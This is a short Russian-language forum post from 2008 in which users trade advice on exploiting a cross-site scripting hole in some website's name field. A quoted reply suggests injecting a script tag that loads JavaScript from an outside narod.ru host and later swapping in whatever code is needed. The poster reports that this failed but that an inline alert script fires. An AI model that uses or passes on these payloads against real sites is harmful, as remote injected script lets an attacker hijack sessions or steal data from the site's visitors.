15.04.2008, 15:01
|
|
Участник форума
Регистрация: 02.03.2008
Сообщений: 111
Провел на форуме:
130720
Репутация:
6
|
|
Сообщение от Scipio
в поле ваше имя вводи: <script src=http://stranica.narod.ru/1.js></script>
в 1.js напиши:
alert("XSS");
и пробуй, если алерт вылетит, то все работает, потом просто изменишь 1.js как тебе нужно и все
т.е. смысл как я понимаюв том что кавычки фильтруются, и протокол ты не указал
Сделал как ты сказал,но алерт не вышел, но вот почему не знаю....вот в если в поле имени поставить <script>alert(/test/)</script> то алерт вылетает....мдяяяя дела...
|
|
|